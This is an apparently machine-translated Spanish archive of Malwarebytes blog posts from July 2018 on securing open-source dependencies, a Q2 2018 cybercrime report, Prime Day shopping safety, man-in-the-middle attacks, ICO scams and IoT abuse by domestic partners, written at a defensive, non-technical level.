Archivo de categoría Malwarebytes Empresas

Pormalwarebytes

5 formas de encontrar y corregir vulnerabilidades de código abierto

5 formas de encontrar y corregir vulnerabilidades de código abierto

5 formas de encontrar y corregir vulnerabilidades de código abierto

Publicado: 17 de julio de 2018 por 
Última actualización: 16 de julio de 2018

Invitado por  Limor Wainstein

Un descubrimiento reciente de la ejecución subrepticia del código cryptomining por una aplicación de espacio aislado, montando a cuestas sobre el ecosistema de software de código abierto (OSS), plantea preguntas pertinentes sobre la seguridad del código fuente abierto y sus dependencias. Los programadores a menudo usan OSS como un desempate para crear su software, y eso incluye autores de malware.

La aplicación fraudulenta, que se descubrió que estaba minando clientes el 11 de mayo, se entregó a través de Snapstore , el nuevo ecosistema de aplicaciones de distribución cruzada y espacio aislado iniciado y promovido por Canonical, los desarrolladores de Ubuntu. En los seguimientos de ese incidente, Canonical dijo:

Es imposible que un repositorio a gran escala acepte solo software después de que cada archivo individual haya sido revisado en detalle. Eso es cierto tanto si el código fuente está disponible como si no, ya que ninguna institución puede permitirse revisar cientos de miles de líneas de código fuente entrantes todos los días.

Como señaló Canonical, revisar y analizar las dependencias de código abierto no es una tarea fácil. Pero es importante para los programadores que quieren asegurarse de que su software no esté infiltrado por los malos actores, ya sea para obtener criptomonedas o para llevar a cabo negocios aún más nefastos.

¿Por qué necesita proteger sus bibliotecas de código abierto?

Los desarrolladores dependen en gran medida del software de código abierto, y las organizaciones tienden a utilizar bibliotecas populares gratuitas. Sin embargo, de acuerdo con el Informe de Confianza en Ciberseguridad 2016  de Barkley , solo el 22 por ciento de las organizaciones tienen un marco para identificar y analizar regularmente los diversos componentes integrados en sus aplicaciones. Con el crecimiento en el uso de código fuente abierto, la exposición al riesgo se expande también.

Nuevas vulnerabilidades se desenterran constantemente en diferentes códigos de fuente abierta y, preocupantemente, una cantidad de proyectos tienen pocos o ningún mecanismo para identificar y solucionar esos problemas. Según una encuesta reciente de Snyk sobre proveedores de código abierto, el 44 por ciento nunca se ha sometido a una auditoría de seguridad de ningún tipo, mientras que solo el 17 por ciento puede afirmar tener un alto nivel de conocimientos de seguridad.

Además, no existe un procedimiento operativo estándar para documentar la seguridad en proyectos de código abierto. Entre los 400,000 mejores repositorios públicamente disponibles en GitHub, solo el 2.4 por ciento tiene una forma de documentación de seguridad implementada.

Dado que una dependencia de código abierto puede estar muy implementada en varias aplicaciones web, un error o vulnerabilidad abrirá todos  esos proyectos a riesgos de seguridad. Para mejorar la  seguridad de sus componentes de código abierto ,  recomendamos las siguientes cinco prácticas recomendadas para revisar las dependencias, encontrar vulnerabilidades y aplicar parches a los componentes de código abierto vulnerables una vez encontrados.

1. Establezca normas y estándares de seguridad estrictos antes de usar una dependencia

Una buena forma de mejorar la seguridad de sus componentes de código abierto es crear y aplicar políticas que exijan que los desarrolladores las utilicen para demostrar que no tienen vulnerabilidades conocidas.

Muchos desarrolladores aún desconocen en gran parte los riesgos que presentan los diferentes componentes de código abierto. Es de suma importancia ayudarlos a comprender que las vulnerabilidades traídas de los componentes de código abierto a la aplicación ponen en riesgo toda la aplicación, si no la organización como un todo.

Al crear y aplicar políticas que requieren que el equipo de seguridad apruebe los componentes de código abierto o que los desarrolladores demuestren la seguridad de la herramienta, automáticamente se mejora la seguridad de la aplicación, solo haciendo que los desarrolladores conozcan esos riesgos.

2. Mantenga un registro de las actualizaciones de seguridad para las dependencias

Otro aspecto crucial para la seguridad de los componentes de código abierto es tener un inventario actualizado de las bibliotecas de código abierto de su organización, tanto en desarrollo como en producción. Hay un número bastante grande de organizaciones que no tienen información actualizada sobre qué componentes de código abierto están actualmente en uso en sus aplicaciones. Esto plantea una importante amenaza de seguridad.

Muchas de las aplicaciones patentadas populares contienen componentes indirectos de código abierto que podrían no estar en desarrollo activo. La mayoría de estos componentes de código abierto permanecen sin parchear y se vuelven inseguros con el tiempo. Esto se debe generalmente a que los desarrolladores gastan sus recursos en asegurar y mejorar los componentes internos. Sin embargo, ignorar las actualizaciones de seguridad para sus componentes de OSS puede abrir brechas que pasarán desapercibidas.

Un buen lugar para comenzar a rectificar esto es inspeccionando los equipos de desarrollo de la organización sobre qué componentes de código abierto usan y la última vez que se actualizaron. Esto proporciona una ventana para evaluar la actualización del equipo de desarrollo con la seguridad del componente de fuente abierta, así como una lista de proyectos en uso.

Si su organización cuenta con la infraestructura necesaria, también puede crear un repositorio central de componentes de código abierto donde se puedan administrar las actualizaciones de seguridad y las licencias. Al igual que en cualquier otro proceso de seguridad, administrar un componente de código abierto no es un esfuerzo de una sola vez. Es un proceso continuo mientras la aplicación esté en despliegue. Revisa, enjuaga y repite.

Al garantizar que se sigan sus políticas en las bibliotecas de código abierto, y al monitorear cómo se están utilizando, así como al administrar su inventario, su programa de seguridad general de la aplicación debería ser una buena opción.

3. Pon a prueba tus componentes y dependencias

Probablemente el método más seguro para mejorar y garantizar la seguridad de su código fuente abierto, y en el proceso su aplicación general, es probar la seguridad de los componentes de código abierto que se utilizan en su organización una vez que se han identificado.

El análisis de fuente abierta es tan importante como el código de propiedad. Esto no solo se debe a que el código podría contener vulnerabilidades de seguridad desconocidas, sino también porque sus dependencias y funciones pueden diferir entre diferentes casos de uso. Esto podría significar que un componente puede estar seguro en una aplicación, pero que se considera inseguro cuando se usa en una aplicación diferente. En casos como este, solo las pruebas y la revisión del código pueden identificar estos problemas.

4. Cree herramientas internas en lugar de bibliotecas no compatibles (caducadas)

Para las bibliotecas expiradas, o las bibliotecas que ya no tienen sistemas de mantenimiento de desarrollador activos, es mejor construir sus propias herramientas internas que pueda usar para verificar y solucionar vulnerabilidades activamente. Aunque el costo inicial y el tiempo invertido podrían disuadir a algunas organizaciones y equipos de desarrollo, a largo plazo, la funcionalidad de una herramienta interna puede ser un activo para los desarrolladores.

También puede considerar devolver su esfuerzo interno a la comunidad, fortaleciendo el ecosistema de código abierto. Esto alentará a más desarrolladores a enviar parches y revisiones y, por lo tanto, a mejorar la seguridad general de la biblioteca. Además de eso, se ganará el respeto de los desarrolladores de código abierto, lo que lo ayudará a crecer como individuo y como negocio. Por ejemplo, en los últimos años, Microsoft lanzó toneladas de bibliotecas bajo una licencia de código abierto que les ayudó a ganarse la confianza de los desarrolladores y usuarios de OSS.

5. Use herramientas de seguridad para verificar vulnerabilidades de seguridad

A lo largo de los años se han desarrollado varias herramientas comerciales y de código abierto para abordar el problema de la identificación de vulnerabilidades de seguridad en componentes de código abierto. Cada herramienta o servicio aborda el problema de forma un poco diferente.

Proyecto de seguridad de nodo (NSP)

El NSP es ampliamente conocido por su trabajo en módulos Node.js y dependencias de NPM. La última versión de npm integra NSP para implementar el script de auditoría npm. Comprueba si existen vulnerabilidades conocidas en los módulos de nodo y las dependencias relacionadas, y ofrece soporte para reparar esas vulnerabilidades.

RetireJS

RetireJS es un comprobador de dependencias de código abierto específico para JavaScript. Su única propuesta de venta (USP) es su facilidad de uso. RetireJS contiene múltiples componentes, incluido un escáner de línea de comandos, así como complementos para Chrome, Firefox, Grunt, Gulp, ZAP y Burp.

OSSIndex

OSSIndex es una herramienta que admite varias tecnologías diferentes. Efectivamente cubre los ecosistemas JavaScript, .NET / C # y Java. También proporciona vulnerabilidad de API de forma gratuita.

Verificación de dependencia

Dependency-check es compatible con Java, .NET y JavaScript, además de Ruby. Extrae su información de vulnerabilidad del NIST NVD.

Herramientas comerciales

Además de las herramientas gratuitas, hay algunas herramientas comerciales que puede usar para ayudar a encontrar vulnerabilidades en su código de código abierto. Los populares incluyen:

  • Hakiri: una herramienta comercial que proporciona comprobaciones de dependencia para proyectos GitHub basados ​​en Rub-y y Rails a través del análisis de código estático
  • Snyk: un servicio comercial que se centra en las dependencias JavaScript npm
  • WhiteSource: actualmente es compatible con Ruby, NPM, PHP, Python y Bower
  • SRC: CLR: Source Clear viene con una carga de complementos para varios IDE, sistemas de implementación y repositorios de origen, así como también una interfaz de línea de comando

Los componentes de código abierto generalmente son seguros cuando hay una gran cantidad de personas revisando el código. Sin embargo, hacer que el código fuente esté disponible o que muchos usuarios observen el código fuente no garantiza que todos los problemas de seguridad se hayan encontrado y solucionado. Es por eso que es importante integrar políticas de seguridad estándar de la industria en su aplicación.

En esta publicación, hemos cubierto algunas de las mejores formas posibles de proteger sus componentes de código abierto contra vulnerabilidades y otros ataques de seguridad. Entonces, ¿qué piensas sobre la seguridad de los componentes de código abierto? Compártalos en los comentarios a continuación.

Pormalwarebytes

Tácticas y técnicas de cibercrimen Segundo trimestre 2018

Tácticas y técnicas de cibercrimen Q2 2018

Tácticas y técnicas de cibercrimen Q2 2018

Publicado: 17 de julio de 2018 por 
Última actualización: 16 de julio de 2018

Un trimestre generalmente lento refleja una calma general en el delito cibernético, retomando donde quedó Q1 con cryptominers que siguen dominando, ransomware que continúa evolucionando a través de la experimentación, y exploits haciendo un regreso pequeño pero significativo.

En casi todas las categorías de malware para las detecciones de empresas y consumidores, vimos una disminución en el volumen, lo que corrobora nuestro sentimiento general de «Dang, ha sido un poco callado de aquí» desde el comienzo del nuevo año. Sin embargo, nuestro malestar relativo estuvo puntuado, con algunos desarrollos interesantes pasando de Q1 a Q2. De qué amenaza carecían los actores en cantidad compensada en calidad.

Las dos principales detecciones de consumidor de Malwarebytes continúan siendo adware y cryptomining, respectivamente, mientras que los mineros se hicieron cargo del número uno para las detecciones de negocios en Q2. El software espía, que tuvo un sólido Q1 para las empresas, bajó un 40 por ciento hasta el número cinco, mientras que los troyanos bancarios se mantuvieron estables en la posición número dos, a pesar de caer en las detecciones en casi un 50 por ciento. Mientras tanto, las puertas traseras se dispararon tanto en el lado de los consumidores como en el de las empresas, y las detecciones de los consumidores aumentaron en un 442 por ciento.

Los nuevos desarrollos en ransomware y cryptomining impulsaron el mercado, ya que los ataques Q2 generalmente mostraron más sofisticación que sus contrapartes de Q1. La introducción del complejo malware VPNFilter, que dejó caer ataques de varias etapas contra cientos de miles de usuarios desprevenidos de pequeñas oficinas y consumidores, sacudió a la adormecida industria de seguridad cibernética. Si bien los brotes de 2017, como WannaCry y NotPetya, no han sido igualados en términos de volumen de distribución e impacto, VPNFilter, SamSam y otras campañas tan complicadas muestran que 2018 podría ser el año de ataques dirigidos de mayor nivel.

Entonces, ¿cómo sacamos estas conclusiones? Como ya hicimos en los últimos informes trimestrales, combinamos inteligencia y estadísticas recopiladas de abril a junio de 2018 de nuestros equipos de Inteligencia, Investigación y Ciencia de Datos con telemetría de nuestros productos para consumidores y empresas, que se implementan en millones de máquinas. . Esto es lo que aprendimos sobre el delito cibernético en el segundo trimestre de 2018.

  • Cryptomining todavía está caliente, pero comienza a disminuir
  • GandCrab el rey ransomware variante
  • Adware aumentó un 19% respecto del último trimestre para los consumidores
  • VPNFilter debuta con más de 500,000 detecciones
  • Las hazañas en aumento
  • Estafadores dirigidos cada vez más a PII (información de identificación personal)

Para obtener más información sobre lo anterior, así como obtener una visión detallada de las estadísticas de detección y predicciones para el próximo trimestre. Descargar el:

 Informe de Técnicas y Tácticas Cibercrimenras para el Q2 2018

Pormalwarebytes

Una guía: cómo mantenerse a salvo en la venta de primer día de Amazon

Una guía: cómo mantenerse a salvo en la venta de primer día de Amazon

Una guía: cómo mantenerse a salvo en la venta de primer día de Amazon

Publicado: 15 de julio de 2018 por 

¡Tarjeta bancaria, cheque!

Lista de compras: ¡consultar!

Lumbar respaldo almohada almohada- !

Audífonos con cancelación de ruido . ¡Verifique!

Y, por supuesto, ¡café !

Si eres un comprador de Amazon, ¡ya sabes que Prime Day está cerca!

Y con eso, queremos decir «mañana».

Si usted es uno de los muchos que tiene miedo de despedirse del fin de semana, este es probablemente el lunes del año que espera.

Es cierto que Amazon Prime Day no es su evento habitual de compras de Acción de Gracias, pero se ha vuelto tan masivo tan rápidamente que justifica una consecuencia no deseada: captar la atención de los actores de amenazas en línea.

Un gran problema

Amazon lanzó Prime Day en 2015 durante el vigésimo aniversario de la compañía. Y estaban intensificando su juego desde entonces.

Hasta la fecha, Prime Day 2017 es aclamado como el mayor evento de compras en la historia de la compañía , superando sus ingresos de 2016 Black Friday y Cyber ​​Monday.

Los pedidos realizados a través de dispositivos móviles también se dispararon, gracias a la aplicación de Amazon que muchos usuarios han descargado e instalado solo para Prime Day. Por supuesto, el aumento general de las ventas también se traduce en mayores ganancias para las pequeñas empresas de todo el mundo . En caso de que no lo sepa, una gran parte de los vendedores en Amazon son pequeñas empresas .

No será una sorpresa esperar que el Prime Day 2018 sea más grande que el año pasado, y los cibercriminales pueden contar con esto.

Su lista de recordatorios de seguridad de Amazon Prime Day: qué hacer y qué no hacer

Los lectores habituales del blog Malwarebytes Labs saben que Amazon se ha utilizado en varias campañas de amenazas para los usuarios objetivo. En 2015-2016, hemos documentado algunos correos electrónicos no deseados que circulaban por la web con el logotipo de Amazon, y sus artimañas iban desde solicitar a los usuarios confirmar la información de sus cuentas ,  completar una encuesta a cambio de una pequeña fortuna y  canjear pronto. -to-be-expired $ 100 Crédito de Amazon Prime .

Luego, en 2017, Mark Jones (escribiendo para Kim Komando) informó acerca de un correo electrónico de phishing que Kim recibió casi un mes después de la finalización de Prime Day. El correo electrónico ofrece a los destinatarios un bono de $ 50 como bonificación por revisar un producto que compraron recientemente en Prime Day, según la publicación. Al hacer clic en el enlace del cuerpo del correo electrónico se redirige a una página de inicio de sesión de Amazon falsa.

Más correos electrónicos falsos de Amazon podrían materializarse a partir de ahora. Pero estos no deberían interferir con el hecho de que alguien use o pruebe los servicios de Amazon por primera vez, o de cualquier sitio de comercio electrónico, para el caso. Estos sitios no solo nos brindan la comodidad y el confort para comprar mientras permanecen en la cama y en pijama, sino que también tienen selecciones que no podemos encontrar en las tiendas de ladrillo y cemento de la ciudad.

Si le gusta comprar en Amazon, protéjase protegiendo las credenciales de su cuenta y las transacciones de compra. A continuación, encontrará una lista de qué hacer y qué no hacer, que debe tener a mano junto con su lista de compras.

Hacer…

… descargue solo la aplicación legítima de Amazon de las tiendas de aplicaciones Google Play y Apple , que puede encontrar aquí y aquí , respectivamente. Al hacerlo, evitará confundirse sobre qué aplicación instalar, ya que hay variantes de ellas, y en qué confiar, ya que puede haber imitadores. Los actores de amenazas dirigidos a usuarios en dispositivos móviles se han vuelto más astutos con sus tácticas, la última es el uso de Unicode, lo que permite que las aplicaciones falsas que operan con nombres famosos pasen por escaneos de seguridad.


Leer:  Phony WhatsApp usó Unicode para deslizarse bajo el radar de Google


… configura la autenticación de dos factores (si aún no lo has hecho). Esto es para mayor seguridad, por supuesto. Si usted es el tipo de comprador que se toma su tiempo, puede resultarle bastante molesto volver a ingresar su número de acreditación y autenticación varias veces, pero tener esto habilitado vale la pena.

… use su tarjeta de crédito al pagar las compras tanto como pueda. Esto se debe a que las tarjetas de crédito están aseguradas por el banco, pero no por las tarjetas de débito. Aunque existe un tipo de protección al consumidor llamada devolución de cargo, no es una protección legal. Esto significa que su proveedor de la tarjeta puede o no otorgarle a uno una devolución de cargo, dependiendo del caso.

… mira los correos electrónicos supuestamente originados en Amazon con un ojo crítico . Es un mecanismo de prevención que todos deberíamos practicar al manejar correos electrónicos, ya que al hacerlo le ahorrará mucho dolor de cabeza y combate de incendios a largo plazo.

… familiarizarse con la forma de informar correos electrónicos y páginas de phishing a Amazon . ¿Por qué? Debido a que los compradores compañeros pueden no ser lo suficientemente rápidos como para lucir el correo electrónico falso que acaba de ver. Amazon tiene una guía práctica sobre usuarios que caminan a través del proceso de informes en esta página de Ayuda y Servicio al Cliente .

… compre artículos de vendedores en los que confíe o con los que se sienta cómodo .Al igual que cualquier otro sitio de comercio electrónico, Amazon también tiene malos vendedores. Y con eso, nos referimos a aquellos que (1) se hacen pasar por compañías legítimas robando su marca y la vitrina de productos que venden, (2) pretenden vender productos pero nunca los envían e intentan escaparse con su dinero, o (3) venderle productos falsificados o imitación. Si no sabe en qué vendedor confiar, eche un vistazo a la página de Amazon del proveedor de terceros y vea cuándo se ha creado el perfil. Por lo general, las estafas generalmente son las que acaban de lanzarse y de repente ofrecen páginas sobre páginas de una variedad de productos de la industria, que a menudo son solo imágenes aleatorias robadas de varios vendedores reales. También,

No …

… reutilizar contraseñas. Si la contraseña de la cuenta de Amazon que está utilizando ahora es la misma que su contraseña de Twitter, por ejemplo, es hora de cambiar eso. Simplemente le facilita a los delincuentes el acceso a dos o más de sus cuentas en línea.

… habilitar macros. El correo electrónico de Amazon te ha convencido de que es real. Usted abre el archivo adjunto. Te pide que enciendas las macros. Creo que deberías considerar parar en este punto porque hacer lo que te dice podría abrir dos escenarios posibles: uno, nada sucederá; dos, acaba de obtener su computadora infectada con malware. Piensa sobre esto.

… cae por las estafas de tarjetas de regalo de Amazon. Raramente leemos sobre esto, pero sucede. Por lo general, los vendedores cuestionables le pedirían a los posibles compradores que paguen un artículo fuera de Amazon en forma de tarjetas de regalo. Si un vendedor repentinamente le pregunta esto, desactive la conversación y repórtelos a Amazon inmediatamente.

… usa Wi-Fi público para comprar. Solo estás exponiéndote a los ataques de MitM . Es mejor comprar en casa o (sabemos que lo hace) en el trabajo durante su tiempo de descanso.

Si hacemos un punto para abordar nuestros (potenciales) problemas de seguridad primero y tomar notas mentales del resto en nuestra lista, entonces Prime Day 2018 no debería ser tan estresante. Quizás.

¿Entonces, Qué esperas? ¡Listo, listo, compra!

Otras publicaciones relacionadas con Amazon que podría interesarte leer:

Pormalwarebytes

Cuando tres no son una multitud: explican los ataques del Hombre en el Medio (MitM)

Cuando tres no son una multitud: explican los ataques del Hombre en el Medio (MitM)

Cuando tres no son una multitud: explican los ataques del Hombre en el Medio (MitM)

Publicado: 12 de julio de 2018 por 

Atrás quedaron los días en que las escuchas son solo cosas de espías y chismes de la ciudad. De hecho, ha evolucionado para convertirse en el pasatiempo favorito de todos . Gracias a Internet, ahora es más fácil, ahora que nunca, pasar inadvertido y atrapar información jugosa que presionar la oreja contra la pared de su vecino.

Si bien podemos perdonar y olvidar fácilmente a los oyentes que se encuentran lo suficientemente cerca de nuestro vecindario cuando estamos teniendo conversaciones en público, el espionaje digital, por otro lado, eleva la bandera roja de privacidad a nuevas alturas. Y esto puede hacerse rápidamente aprovechando dos cosas: una, nuestra inclinación para conectarnos a redes Wi-Fi (ya sean inseguras o no, ya sean de uso público o privado); y dos, la explotación de esa red Wi-Fi. Basta con decir que el espionaje digital no es ni debe considerarse un pasatiempo, especialmente si tienes las habilidades y los medios para hacerlo.

Y cuando se trata de escuchar en línea, el término que inmediatamente viene a la mente es man-in-the-middle , esencialmente un escenario en el que una tercera persona se ubica en el medio de dos partes comunicándose entre sí. Una tercera rueda, por así decirlo. Sin embargo, esta persona o entidad no es vista por las dos partes. De hecho, ni siquiera saben que están en compañía de una tercera rueda.

Si bien sabemos que escuchar a escondidas es generalmente un ejercicio pasivo: la persona C asume el papel de oyente-observador y no se involucra con la persona A y la persona B mientras chatean: los ataques de MitM son todo lo contrario. Además de fisgonear, se requiere controlar la conversación; por lo tanto, el contacto con los objetivos es inevitable. Esto hace que un ataque MitM sea un ejercicio activo. Y tal actividad interferente exige inventiva, atención, paciencia, astucia y la voluntad de participar tan profundamente como sea necesario para alcanzar su objetivo.

Los ataques de MitM pueden ser agresivos, siempre subrepticios e invasivos.

Por no mencionar preocupante y espeluznante. ¿Cómo pueden los actores de amenazas hacer esto, y por qué incluso hacerlo?

Los ataques MitM implican el uso indebido de una red para explotar transacciones, conversaciones y transferencias de datos sobre la marcha. Los actores de amenazas pueden hacer esto aprovechando las debilidades de una red o de cualquiera de sus elementos, como el software (navegador, VoIP, etc.).

Muchas organizaciones practican lo que son esencialmente tácticas de MitM, ya sea que afirmen que lo saben o no, para que puedan controlar a sus empleados. Algunos lo hacen con fines publicitarios, como en el caso de Superfish , una pieza de software preinstalada en los productos de consumo de Lenovo.

Los gobiernos también son conocidos como operadores de ataques MitM para espiar de manera proactiva a sus ciudadanos, eludir las medidas de seguridad de las tecnologías , espiar a los países enemigos para robar información clasificada y robar dinero de instituciones financieras basadas en otros países para financiar sus proyectos .

Además, hemos visto que MitM utilizó en gran parte el modus operandi de un grupo delictivo para robar esencialmente a los clientes de empresas europeas privadas a las que apuntaban. Lo hicieron infiltrándose en las redes objetivo para obtener acceso a las cuentas de correo electrónico, monitoreando las solicitudes de pago de estas compañías y luego poniéndose en medio de la conversación por suplantación de identidad, instruyendo a los clientes a enviar pagos a las cuentas bancarias que controla el grupo criminal.

Pormalwarebytes

¿Bloquea todo o nada para evitar el fraude ICO?

¿Bloquea todo o nada para evitar el fraude ICO?

¿Bloquea todo o nada para evitar el fraude ICO?

Publicado: 12 de julio de 2018 por 

En Malwarebytes, creemos que hemos llegado a un punto en el que debemos preguntar a nuestros clientes cómo proceder con el tema de las estafas de ICO. Pedir su opinión puede parecer extraño para algunos de ustedes, pero Malwarebytes proviene de una comunidad de ayuda mutua y confianza. Si no lo sabía, leer cómo se involucró nuestro CEO en el negocio antimalware es una buena forma de familiarizarse con los pilares sobre los que se basa esta compañía.

Para explicar en qué necesitamos su ayuda, necesitaremos explicarles un poco sobre los antecedentes, así que tengan paciencia con nosotros.

¿Qué es un ICO?

ICO es la abreviatura de Initial Coin Offering, que es, de hecho, un método de crowdfunding, utilizado para muchos proyectos relacionados con la criptografía. Los fundadores de una nueva compañía ofrecen acciones de su propio producto blockchain para la venta a cambio de criptomonedas establecidas como Bitcoin, Ether o Monero. Con los fondos reúnen el capital para poner en marcha su empresa. Una vez que la empresa tenga éxito, las «monedas» compradas por los inversionistas valdrán más de lo que compraron.

Así es como debe ser, pero lo que vemos una y otra vez es que las personas que iniciaron el crowdfunding, se apropian de las inversiones y nunca se sabrá de ellas. O los veremos en otro momento, con un nombre diferente, repitiendo el mismo procedimiento. Algunos de estos impostores usan plantillas que reutilizan para cada ICO falso. Estas plantillas son para:

  • Creando una cuenta en el blockchain de Ethereum
  • El script de paquete para la cadena de bloques
  • Los sitios para promocionar su nuevo producto
  • Campañas publicitarias para que la gente visite ese sitio
  • Cuentas en foros relacionados con bitcoins para promocionar el ICO
  • Los libros blancos que explican los objetivos y las metas

Para poner esto en perspectiva, también podría ser bueno mencionar que un estudio reciente mostró que solo el 8% de las OIC lograron comerciar en un intercambio. Por lo tanto, incluso si solo consideramos que el 80% de ellos es una estafa, las posibilidades de que los inversores pierdan su dinero son mucho mayores.

¿Cómo detectar ICO que podría ser fraudulento?

Existen algunos métodos que puede usar para decidir si un ICO vale su dinero duramente ganado:

  • ¿La gente detrás de ICO realmente existe?
  • ¿El plan que tienen tiene sentido?
  • ¿El modelo de ganancias es realista?
  • ¿El equipo detrás del ICO responde preguntas sobre sus planes?
  • ¿Qué tan lejos están en el desarrollo de su moneda, tienen billeteras seguras, etc.?
  • ¿Establecen que los participantes de EE. UU. Deben ser inversores acreditados?

El problema a mano

Hemos estado viendo muchas ICO que no son más que estafas. Y nos gustaría proteger a nuestros clientes contra ellos. Pero, si esperamos hasta que podamos demostrar que son una estafa, probablemente sea demasiado tarde y los ladrones se hayan escapado con las inversiones. Entonces tendríamos que ser más proactivos.

¿Estamos solos en esta batalla? Ciertamente no lo somos.

¿Qué es lo que te pedimos?

Háganos saber en la sección de comentarios debajo de esta publicación si cree que deberíamos bloquear los anuncios de ICO, todos los sitios relacionados con ICO, o déjelo en manos de nuestros clientes para decidir por sí mismos.

Tenga en cuenta que los usuarios de nuestras extensiones de Chrome o Firefox pueden ver algunos de los sitios bloqueados. Esto se debe a que las extensiones se basan en el comportamiento y es posible que hayan detectado una estafa para usted.

Pormalwarebytes

Abuso interno de la IoT: ¿qué podemos hacer para detenerlo?

Abuso interno de la IoT: ¿qué podemos hacer para detenerlo?

Abuso interno de la IoT: ¿qué podemos hacer para detenerlo?

Publicado: 11 de julio de 2018 por 
Última actualización: 10 de julio de 2018

Hace unos 40 años, la película de ciencia ficción / terror Demon Seed contó la historia de una mujer encarcelada lentamente por una inteligencia artificial, que invadió el sistema de hogar inteligente que su esposo había diseñado para administrarlo. La AI cerró puertas, ventanas, apagó las comunicaciones e incluso puso una versión sintetizada de ella en la pantalla en la puerta principal para asegurar a los visitantes que estaba «bien».

La realidad, por supuesto, es que ella era todo menos eso. Ha habido un sinfín de obras de ficción en las que la tecnología inteligente que micromaneó el entorno hogareño se ha vuelto deshonesta . Lamentablemente, esas obras de ficción se desangran en la realidad.

En 2018, de repente tenemos el equivalente en el mundo real en hogares y detrás de puertas cerradas. Hablaremos sobre los problemas actuales momentáneamente, pero primero echemos un vistazo cómo llegamos aquí echando un vistazo atrás hace unos 15 años.

Robo de contraseñas y spyware de PC

Durante años, un subconjunto de socios abusivos con conocimientos técnicos ha colocado spyware en computadoras o dispositivos móviles, contraseñas robadas y, en general, ha guardado pestañas en su otra mitad. Esto a menudo puede conducir a la violencia, y como resultado, muchas estrategias para defenderse contra esto se han elaborado a lo largo de los años. Efectivamente me involucré en la seguridad debido a un caso de abuso relacionado con la tecnología , y di muchas charlas sobre este tema desde 2006  junto a representantes de NNEDV (Red Nacional para Terminar con la Violencia Doméstica).

El spyware para el consumidor es un gran problema , y los gigantes tecnológicos como Google están financiando programas diseñados para ayudar a los cónyuges abusados ​​a salir de escenarios de abuso tecnológico.

La ola móvil y el control social

Después de que el spyware basado en PC se convirtió en una herramienta para los abusadores, se produjo un aumento en el «control coercitivo», el acto de exigir revisar correos electrónicos, mensajes de texto, mensajes directos y más enviados a teléfonos móviles. Los socios abusivos que exigen ver mensajes SMS siempre han sido una cosa, pero llevar toda tu existencia en línea y tirarla a un dispositivo de bolsillo siempre aumentaría las apuestas para la gente.

El control coercitivo es un problema tan serio que el Reino Unido tiene leyes específicas contra él , y el acto se convirtió en un crimen en 2015. Si lo declaran culpable, puede esperar ver un máximo de cinco años de prisión o una multa, o ambos en el peor de los casos. De la descripción del control coercitivo:

El comportamiento coercitivo o de control no se relaciona con un solo incidente, es un patrón intencional de incidentes que ocurren con el tiempo para que un individuo ejerza poder, control o coacción sobre otro.

Mantenga el «patrón determinado de incidentes que ocurren con el tiempo para que un individuo ejerza poder o control» en la descripción a medida que pasamos a la siguiente sección sobre el abuso del Internet de las cosas (IoT), porque es relevante.

Internet de las cosas: control total

Un concentrador de control de Internet of Things podría ser un complejo servicio de nube remota que alimenta una multitud de dispositivos, pero para la mayoría de las personas, es un dispositivo que se instala en el hogar y ayuda a encender y controlar electrodomésticos y otros sistemas, generalmente con algún nivel de acceso a Internet y la posibilidad de control adicional a través de un teléfono inteligente. Podría estar a cargo de cámaras de seguridad o sensores de movimiento, o podría ser el paquete completo: calefacción y refrigeración, iluminación, ventanas, cerraduras de puertas, alarmas contra incendios, hornos, temperatura del agua, prácticamente cualquier cosa que se te ocurra.

Los socios abusivos no han tardado en aprovechar esta funcionalidad recién incorporada, con numerosos relatos de ellos que hacen la vida imposible para sus seres queridos, efectivamente atrapados en una reelaboración 24/7 de una casa distópica de ciencia ficción.

Su crueldad solo está limitada por lo que no pueden enganchar a la red general. Encerrar al cónyuge en su lugar de residencia y luego encender el fuego, abanicarlo, encender y apagar luces, deshabilitar servicios, grabar conversaciones, activar alarmas de seguridad ruidosas; el compañero abusado está casi enteramente a su merced.

Hay todo tipo de implicaciones extrañas generadas por este tipo de abuso de tecnologías e individuos en el mundo real. ¿Qué sucede si alguien tiene una reacción adversa al cambio de temperatura severo? ¿Un ataque epiléptico debido a las luces que parpadean rápidamente? ¿Qué tal si alguien apaga las alarmas de humo o la tecnología de respuesta de emergencia de la policía y luego el lugar se incendia o alguien irrumpe?

Alguien podría ser responsable de una muerte, pero ¿cómo lo resolvería la policía, y mucho menos saber dónde echar la culpa?

Por supuesto, esas son situaciones en las que los cónyuges aún viven juntos. También hay escenarios en los que la pareja se ha separado, pero el abusador aún tiene acceso a la tecnología de IoT, y ellos comienzan a jugar con sus vidas de forma remota. Uno es un enfoque algo más directo que el otro, pero ninguno es particularmente bueno para la persona que lo recibe.

Un reto desalentador

Desafortunadamente, este es un hueso duro de roer. En términos generales, los consejos dados a los sobrevivientes de abuso doméstico tienden a errar por el lado de la extrema precaución, porque si el abusador nota la más mínima irregularidad, buscarán represalias. Con computadoras y más formas «tradicionales» de skullduggery basadas en tecnología, generalmente hay algunas partes de margen de maniobra.

Por ejemplo, un compañero abusado puede tener un dispositivo móvil, que está inmediatamente fuera del alcance del abusador en el momento en que salen, suponiendo que no lo hayan manipulado. En el escritorio, la navegación en modo incógnito es útil, al igual que los sitios web de abuso doméstico que ofrecen sugerencias y  botones de cierre rápido en caso de que el abusador esté cerca.

Sin embargo, incluso entonces, existe el riesgo: el abusador puede conservar los registros de la red o usar software de vigilancia, y los intentos de «ocultar» los datos de navegación pueden levantar sospechas. De hecho, este es un ejemplo donde los sitios web que se mueven lentamente hacia los HTTP son beneficiosos, porque un abusador no puede ver los datos del sitio web. Aun así, es posible que aún vean las URL y vuelvan al punto de partida.

Con IoT, todo es mucho más difícil en situaciones de abuso doméstico.

Una gran cantidad de tecnología de IoT es increíblemente insegura porque la funcionalidad es donde está; seguridad, no tanto. Es por eso que usted ve tantas historias sobre webcams  transmitidas a través de Internet, o juguetes que hacen cosas raras , o la tostadora ocasionalmente conectada a Internet.

En comparación, los centros principales que controlan todo en el hogar suelen estar bastante bloqueados, especialmente si son una marca conocida como Alexa o Nest.

En estas situaciones, cuanto más bloqueado esté el dispositivo, más difícil será sugerir soluciones de evasión para las personas amenazadas. Difícilmente pueden saltar y comenzar clandestinamente a manipular la tecnología sin previo aviso; francamente, la gente tiende a darse cuenta si un dispositivo físico no actúa de manera mucho más rápida que su pieza encubierta de spyware diseñada para tomar correos electrónicos de una computadora portátil.

